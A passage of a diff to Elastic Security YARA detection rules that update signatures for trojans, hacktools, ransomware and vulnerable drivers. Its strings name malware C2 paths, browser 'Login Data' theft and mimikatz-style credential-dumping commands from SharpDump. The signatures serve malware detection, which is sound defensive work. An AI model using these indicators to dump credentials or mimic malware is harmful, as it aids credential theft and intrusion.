uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Windows_Hacktool_Physmem_B3Fa382B : FILE +rule ELASTIC_Windows_Trojan_STRRAT_A3E48Cd2 : MEMORY { meta: - description = "Detects Windows Hacktool Physmem (Windows.Hacktool.PhysMem)" + description = "Detects Windows Trojan Strrat (Windows.Trojan.STRRAT)" author = "Elastic Security" - id = "b3fa382b-48a5-4004-92ad-bba0d42243ad" - date = "2022-04-04" - modified = "2022-04-04" + id = "a3e48cd2-e65f-40db-ab55-8015ad871dd6" + date = "2024-03-13" + modified = "2024-03-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_PhysMem.yar#L22-L40" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "88df37ede18bea511f1782c1a6c4915690b29591cf2c1bf5f52201fbbb4fa2b9" - logic_hash = "36a60b78de15a52721ad4830b37daffc33d7689e8b180fe148876da00562273a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_STRRAT.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "97e67ac77d80d26af4897acff2a3f6075e0efe7997a67d8194e799006ed5efc9" + logic_hash = "32f79695829f703bf9996d212aeb563791aed28e1bbb9f700cb45325fd02db77" + score = 75 + quality = 75 + tags = "MEMORY" + fingerprint = "efda9a8bd5f9e227a6696de1b4ea7eb7343b08563cfcbe73fdd75164593bd111" + severity = 100 + arch_context = "x86" + scan_context = "memory" + license = "Elastic License v2" + os = "windows" + + strings: + $str1 = "strigoi/server/ping.php?lid=" + $str2 = "/strigoi/server/?hwid=" + + condition: + all of them +} +rule ELASTIC_Windows_Trojan_Modpipe_12Bc2604 : FILE MEMORY +{ + meta: + description = "Detects Windows Trojan Modpipe (Windows.Trojan.ModPipe)" + author = "Elastic Security" + id = "12bc2604-d3fe-40d6-8a7c-5bd53e403453" + date = "2023-07-27" + modified = "2023-09-20" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_ModPipe.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "0a26de1b2fb48d65cde61b60c0eba478da73a3eeaeb785d1b2d6095eccbe34e2" + score = 75 + quality = 75 + tags = "FILE, MEMORY" + fingerprint = "30ff9f28cec84496ae7c809ec0401bc10573c690d93f3fb3865b5a913508795e" + severity = 100 + arch_context = "x86" + scan_context = "file, memory" + license = "Elastic License v2" + os = "windows" + + strings: + $a1 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0)" fullword + $a2 = "/robots.txt" fullword + $a3 = "www.yahoo.com/?" + $a4 = "www.google.com/?" + + condition: + all of them +} +rule ELASTIC_Windows_Vulndriver_BSMI_65223B8D : FILE +{ + meta: + description = "Name: BSMI.sys, Version: 1.0.0.3" + author = "Elastic Security" + id = "65223b8d-451a-4ae6-90cc-17d1482cc834" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_BSMI.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347" + logic_hash = "c4fa65bbd9d374092137b65209f29744caeb8b04fbd364b1acc67b73c45604e8" score = 75 quality = 75 tags = "FILE" - fingerprint = "81285d1d8bdb575cb3ebf7f2df2555544e3f1342917e207def00c358a77cd620" + fingerprint = "9ad213d919719d0fb0a99dcb9863720adec173e9801663e1cf5b99881435914a" + threat_name = "Windows.VulnDriver.BSMI" severity = 50 arch_context = "x86" scan_context = "file" @@ -56748,27 +57495,29 @@ rule ELASTIC_Windows_Hacktool_Physmem_B3Fa382B : FILE os = "windows" strings: - $str1 = "\\Phymemx64.pdb" + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 42 00 53 00 4D 00 49 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Godlua_Ed8E6228 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Sdbot_98628Ea1 : FILE MEMORY { meta: - description = "Detects Linux Trojan Godlua (Linux.Trojan.Godlua)" + description = "Detects Linux Trojan Sdbot (Linux.Trojan.Sdbot)" author = "Elastic Security" - id = "ed8e6228-d5be-4b8e-8dc2-7072b1236bfa" + id = "98628ea1-40d8-4a05-835f-a5a5f83637cb" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Godlua.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "848ef3b198737f080f19c5fa55dfbc31356427398074f9125c65cb532c52ce7a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Sdbot.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5568ae1f8a1eb879eb4705db5b3820e36c5ecea41eb54a8eef5b742f477cbdd8" + logic_hash = "55b8e3fa755965b85a043015f9303644b8e06fe8bfdc0e2062de75bdc2881541" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9b73c2bbbe1bc43ae692f03b19cd23ad701f0120dff0201dd2a6722c44ea51ed" + fingerprint = "15cf6b916dd87915738f3aa05a2955c78a357935a183c0f88092d808535625a5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56776,28 +57525,184 @@ rule ELASTIC_Linux_Trojan_Godlua_Ed8E6228 : FILE MEMORY os = "linux" strings: - $a = { C0 18 48 89 45 E8 EB 60 48 8B 85 58 FF FF FF 48 83 C0 20 48 89 } + $a = { 54 00 3C 08 54 00 02 00 26 00 00 40 4D 08 00 5C 00 50 00 49 00 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Windivert_25991186 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bumblebee_35F50Bea : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Windivert (Windows.VulnDriver.WinDivert)" + description = "Detects Windows Trojan Bumblebee (Windows.Trojan.Bumblebee)" author = "Elastic Security" - id = "25991186-7a44-446c-9e97-e91bb9adfd77" - date = "2024-06-20" - modified = "2024-07-02" + id = "35f50bea-c497-4cc6-b915-8ad3aca7bee6" + date = "2022-04-28" + modified = "2022-06-09" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_WinDivert.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8da085332782708d8767bcace5327a6ec7283c17cfb85e40b03cd2323a90ddc2" - logic_hash = "a67679bb2f23d1f6691c9ad23da1fd4c2402701ba1929c7abf078d7d95011a08" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Bumblebee.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9fff05a5aa9cbbf7d37bc302d8411cbd63fb3a28dc6f5163798ae899b9edcda6" + logic_hash = "9f22b1b7f9e2d7858738d02730ef5477f8d430ad3606ebf4ac8b01314fdc9c46" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "43c7f0dfe43c64d644fcb0171433a8af0f7b4c38f7601d42923762c3d882ac31" + fingerprint = "f2e07a9b7d143ca13852f723e7d0bd55365d6f8b5d9315b7e24b7f1101010820" + severity = 100 + arch_context = "x86" + scan_context = "file, memory" + license = "Elastic License v2" + os = "windows" + + strings: + $a1 = { 43 28 45 33 D2 4D 8D 0C 00 44 88 54 24 20 66 48 0F 7E C9 66 0F } + $a2 = { 31 DA 48 31 C7 45 ?? C9 B9 E8 03 C7 45 ?? 00 00 BA 01 C7 45 ?? 00 00 00 48 C7 45 ?? B8 88 77 66 C7 45 ?? 55 44 33 22 C7 45 ?? 11 FF D0 EB C6 45 } + + condition: + any of them +} +rule ELASTIC_Windows_Trojan_Bumblebee_70Bed4F3 : FILE MEMORY +{ + meta: + description = "Detects Windows Trojan Bumblebee (Windows.Trojan.Bumblebee)" + author = "Elastic Security" + id = "70bed4f3-f515-4186-ac6c-e9db72b8a95a" + date = "2022-04-28" + modified = "2022-06-09" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Bumblebee.yar#L22-L46" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9fff05a5aa9cbbf7d37bc302d8411cbd63fb3a28dc6f5163798ae899b9edcda6" + logic_hash = "3ff97986bfd8df812c4ef94395b3ac7f9ead4d059c398f8984ee217a1bcee4af" + score = 75 + quality = 75 + tags = "FILE, MEMORY" + fingerprint = "016477598ce022cc75f591d1c72535a3353ecc4e888642e72aa29476464a8c2f" + severity = 100 + arch_context = "x86" + scan_context = "file, memory" + license = "Elastic License v2" + os = "windows" + + strings: + $a1 = "Checking Virtual PC processes %s " wide fullword + $a2 = "SELECT * FROM Win32_ComputerSystemProduct" ascii fullword + $a3 = "Injection-Date" ascii fullword + $a4 = " -Command \"Wait-Process -Id " ascii fullword + $a5 = "%WINDIR%\\System32\\wscript.exe" wide fullword + $a6 = "objShell.Run \"rundll32.exe my_application_path" + $a7 = "Checking reg key HARDWARE\\Description\\System - %s is set to %s" wide fullword + + condition: + 5 of them +} +rule ELASTIC_Linux_Trojan_Chinaz_A2140Ca1 : FILE MEMORY +{ + meta: + description = "Detects Linux Trojan Chinaz (Linux.Trojan.Chinaz)" + author = "Elastic Security" + id = "a2140ca1-0a72-4dcb-bf7c-2f51e84a996b" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Chinaz.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7c44c2ca77ef7a62446f6266a757817a6c9af5e010a219a43a1905e2bc5725b0" + logic_hash = "c9c63114e45b45b1c243af1f719cddc838a06a1f35d65dca6a2fb5574047eff0" + score = 60 + quality = 45 + tags = "FILE, MEMORY" + fingerprint = "ac620f3617ea448b2ad62f06490c37200fa0af8a6fe75a6a2a294a7b5b4a634a" + severity = 100 + arch_context = "x86" + scan_context = "file, memory" + license = "Elastic License v2" + os = "linux" + + strings: + $a = { C0 53 8B 74 24 0C 8B 5C 24 10 8D 74 26 00 89 C2 89 C1 C1 FA 03 83 } + + condition: + all of them +} +rule ELASTIC_Windows_Hacktool_Sharpdump_7C17D8B1 : FILE MEMORY +{ + meta: + description = "Detects Windows Hacktool Sharpdump (Windows.Hacktool.SharpDump)" + author = "Elastic Security" + id = "7c17d8b1-35cf-440e-8f4e-44abdc2054bb" + date = "2022-10-20" + modified = "2022-11-24" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SharpDump.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "14c3ea569a1bd9ac3aced4f8dd58314532dbf974bfa359979e6c7b6a4bbf41ca" + logic_hash = "10ca29b097d9f1cef27349751e8f1e584ead1056a636224a80f00823ca878c13" + score = 75 + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "cf1e23fc0a317959fceadae8984240b174dac22a1bcabccf43c34f0186a3ac23" + severity = 100 + arch_context = "x86" + scan_context = "file, memory" + license = "Elastic License v2" + os = "windows" + + strings: + $guid = "9c9bba3-a0ea-431c-866c-77004802d" ascii wide nocase + $print_str0 = "Please use \"SharpDump.exe [pid]\" format" ascii wide + $print_str1 = "[*] Use \"sekurlsa::minidump debug.out\" \"sekurlsa::logonPasswords full\" on the same OS/arch" ascii wide + $print_str2 = "[+] Dumping completed. Rename file to \"debug{0}.gz\" to decompress" ascii wide + $print_str3 = "[X] Not in high integrity, unable to MiniDump!" ascii wide + + condition: + $guid or all of ($print_str*) +} +rule ELASTIC_Windows_Trojan_Netwire_6A7Df287 : FILE MEMORY +{ + meta: + description = "Detects Windows Trojan Netwire (Windows.Trojan.Netwire)" + author = "Elastic Security" + id = "6a7df287-1656-4779-9a96-c0ab536ae86a" + date = "2021-06-28" + modified = "2021-08-23" + reference = "https://www.elastic.co/security-labs/netwire-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Netwire.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e6f446dbefd4469b6c4d24988dd6c9ccd331c8b36bdbc4aaf2e5fc49de2c3254" + logic_hash = "d5f36e2a81cf0a9037267d39266b4c31ca9c07b05fb9772e296aeac2da6051a5" + score = 75 + quality = 75 + tags = "FILE, MEMORY" + fingerprint = "85051a0b94da4388eaead4c4f4b2d16d4a5eb50c3c938b3daf5c299c9c12f1e6" + severity = 100 + arch_context = "x86" + scan_context = "file, memory" + license = "Elastic License v2" + os = "windows" + + strings: + $a = { 0F B6 74 0C 10 89 CF 29 C7 F7 C6 DF 00 00 00 74 09 41 89 F3 88 5C } + + condition: + all of them +} +rule ELASTIC_Windows_Trojan_Netwire_1B43Df38 : FILE MEMORY +{ + meta: + description = "Detects Windows Trojan Netwire (Windows.Trojan.Netwire)" + author = "Elastic Security" + id = "1b43df38-886e-4f58-954a-a09f30f19907" + date = "2021-06-28" + modified = "2021-08-23" + reference = "https://www.elastic.co/security-labs/netwire-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Netwire.yar#L22-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e6f446dbefd4469b6c4d24988dd6c9ccd331c8b36bdbc4aaf2e5fc49de2c3254" + logic_hash = "bb0eb1c1969bc1416e933822843293c5d41bf9bc3d402fa5dbdc3cdf2f4b394a" + score = 75 + quality = 75 + tags = "FILE, MEMORY" + fingerprint = "4142ea14157939dc23b8d1f5d83182aef3a5877d2506722f7a2706b7cb475b76" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56805,28 +57710,30 @@ rule ELASTIC_Windows_Vulndriver_Windivert_25991186 : FILE MEMORY os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 44 00 69 00 76 00 65 00 72 00 74 00 2E 00 73 00 79 00 73 00 00 00 } + $a1 = "[%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword + $a2 = "\\Login Data" + $a3 = "SOFTWARE\\NetWire" fullword condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $original_file_name + 2 of them } -rule ELASTIC_Windows_Trojan_Doorme_246Eda61 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Netwire_F85E4Abc : FILE MEMORY { meta: - description = "Detects Windows Trojan Doorme (Windows.Trojan.DoorMe)" + description = "Detects Windows Trojan Netwire (Windows.Trojan.Netwire)" author = "Elastic Security" - id = "246eda61-23b5-49b8-8409-623f2722c289" - date = "2022-12-09" - modified = "2022-12-15" - reference = "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DoorMe.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "96b226e1dcfb8ea2155c2fa508125472c8c767569d009a881ab4c39453e4fe7f" - logic_hash = "01240f2e23904498c34ec805cc8bc3e9ac7b76c6519685ef6b367066f1a0bc5b" + id = "f85e4abc-f2d7-491b-a1ad-a59f287e5929" + date = "2022-08-14" + modified = "2022-09-29" + reference = "https://www.elastic.co/security-labs/netwire-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Netwire.yar#L45-L64" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ab037c87d8072c63dc22b22ff9cfcd9b4837c1fee2f7391d594776a6ac8f6776" + logic_hash = "af8fc8fff2e1a0b6c87ac6d24fecf2e1cefe6313ec66da13fddd1be25c1c3d92" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "aa8c2ae2e966bf4e0c79faa90b14fd77d07b7c68076f39c56b384dada9dd0e96" + fingerprint = "66cae88c9f8b975133d2b3af94a869244d273021261815b15085c638352bf2ca" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56834,33 +57741,28 @@ rule ELASTIC_Windows_Trojan_Doorme_246Eda61 : FILE MEMORY os = "windows" strings: - $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? } - $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? } - $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? } - $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? } - $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 66 90 } - $str_0 = ".?AVDoorme@@" ascii fullword + $a = { C9 0F 44 C8 D0 EB 8A 44 24 12 0F B7 C9 75 D1 32 C0 B3 01 8B CE 88 44 } condition: - 3 of ($seq*) or 1 of ($str*) + all of them } -rule ELASTIC_Windows_Trojan_Icedid_1Cd868A6 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Netwire_F42Cb379 : FILE MEMORY { meta: - description = "Detects Windows Trojan Icedid (Windows.Trojan.IcedID)" + description = "Detects Windows Trojan Netwire (Windows.Trojan.Netwire)" author = "Elastic Security" - id = "1cd868a6-d2ec-4c48-a69a-aaa6c7af876c" - date = "2021-02-28" - modified = "2021-08-23" - reference = "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "68dce9f214e7691db77a2f03af16a669a3cb655699f31a6c1f5aaede041468ff" - logic_hash = "4765b2b1d463f09d7e21367c2832b3ad668aa67d8078798a14295b6e6c846c1c" + id = "f42cb379-ac8c-4790-a6d3-aad6dc4acef6" + date = "2022-08-14" + modified = "2022-09-29" + reference = "https://www.elastic.co/security-labs/netwire-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Netwire.yar#L66-L90" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ab037c87d8072c63dc22b22ff9cfcd9b4837c1fee2f7391d594776a6ac8f6776" + logic_hash = "fc1436596987d3971a464e707ee6fd5689e7d2800df471c125c1e3f748537f5d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3e76b3ac03c5268923cfd5d0938745d66cda273d436b83bee860250fdcca6327" + fingerprint = "a52d2be082d57d07ab9bb9087dd258c29ef0528c4207ac6b31832f975a1395b6" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56868,28 +57770,33 @@ rule ELASTIC_Windows_Trojan_Icedid_1Cd868A6 : FILE MEMORY os = "windows" strings: - $a = { 24 2C B9 09 00 00 00 2A C2 2C 07 88 44 24 0F 0F B6 C3 6B C0 43 89 44 } + $a1 = "http://%s%ComSpec" ascii fullword + $a2 = "%c%.8x%s" ascii fullword + $a3 = "%6\\6Z65dlNh\\YlS.dfd" ascii fullword + $a4 = "GET %s HTTP/1.1" ascii fullword + $a5 = "R-W65: %6:%S" ascii fullword + $a6 = "PTLLjPq %6:%S -qq9/G.y" ascii fullword condition: - all of them + 4 of them } -rule ELASTIC_Windows_Trojan_Icedid_237E9Fb6 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Dharma_Aa5Eefed : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Icedid (Windows.Trojan.IcedID)" + description = "Identifies DHARMA ransomware" author = "Elastic Security" - id = "237e9fb6-b5fa-4747-af1f-533c76a5a639" - date = "2021-02-28" + id = "aa5eefed-7212-42c9-b51d-2c58c65b53e5" + date = "2020-06-25" modified = "2021-08-23" - reference = "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L23-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b21f9afc6443548427bf83b5f93e7a54ac3af306d9d71b8348a6f146b2819457" - logic_hash = "31479eae077b2d78cb1770eef3b37bec941f35c9ceb329e01dd65a32e785fa74" + reference = "https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Dharma.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "bbafc2eac17562f315b09fa42eb601d0140152917d7962429df3a378abe67732" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "e2ea6d1477ce4132f123b6c00101a063f7bba7acf38be97ee8dca22cc90ed511" + tags = "BETA, FILE, MEMORY" + fingerprint = "d3baf3474b450931b594322d190b243bdd813156ad80f04abcadde0db3bfe149" + threat_name = "Windows.Ransomware.Dharma" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56897,28 +57804,29 @@ rule ELASTIC_Windows_Trojan_Icedid_237E9Fb6 : FILE MEMORY os = "windows" strings: - $a = { 60 8B 55 D4 3B D0 7E 45 83 F8 08 0F 4C 45 EC 3B D0 8D 3C 00 0F } + $c1 = { 4D F0 51 8B 55 E8 52 E8 CD 10 00 00 83 C4 08 89 45 E8 8A 45 F9 04 01 88 45 F9 0F B6 4D F9 8B 55 E4 8A 04 0A 88 45 FB 0F B6 4D FB 0F B6 55 FA 03 D1 88 55 FA 0F B6 45 FA 8B 4D E4 8A 14 01 88 55 EF 0F B6 45 F9 8B 4D E4 8A 55 EF 88 14 01 0F B6 45 FA 8B 4D E4 8A 55 FB 88 14 01 8B 45 0C 03 45 F4 0F B6 08 0F B6 55 FB 0F B6 45 EF 03 D0 0F B6 D2 8B 45 E4 0F B6 14 10 33 CA 8B 45 E8 03 45 F4 88 08 } + $c2 = { 21 0C 7D 01 02 04 08 10 20 40 80 1B 36 6C D8 AB 4D 9A 2F 5E BC 63 C6 97 35 6A D4 B3 7D FA EF C5 91 00 00 A5 63 63 C6 84 7C 7C F8 99 77 77 EE 8D 7B 7B F6 0D F2 F2 FF BD 6B 6B D6 B1 6F 6F DE 54 C5 C5 91 50 30 30 60 03 01 01 02 A9 67 67 CE 7D 2B 2B 56 } condition: - all of them + 1 of ($c*) } -rule ELASTIC_Windows_Trojan_Icedid_F1Ce2F0A : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Dharma_B31Cac3F : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Icedid (Windows.Trojan.IcedID)" + description = "Identifies DHARMA ransomware" author = "Elastic Security" - id = "f1ce2f0a-0d34-46a4-8e42-0906adf4dc1b" - date = "2021-02-28" + id = "b31cac3f-6e04-48b2-9d16-1a6b66fa8012" + date = "2020-06-25" modified = "2021-08-23" - reference = "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L45-L65" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b21f9afc6443548427bf83b5f93e7a54ac3af306d9d71b8348a6f146b2819457" - logic_hash = "a1f1824a7208201616dde40bea514dfc2cdf908bd8ed24b9f96c2bcad2c8107f" + reference = "https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Dharma.yar#L23-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "30500e35721e9db3d63cafa5ca10818557fa9f4e0bda9c0d02283183508cf7b5" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "1940c4bf5d8011dc7edb8dde718286554ed65f9e96fe61bfa90f6182a4b8ca9e" + tags = "BETA, FILE, MEMORY" + fingerprint = 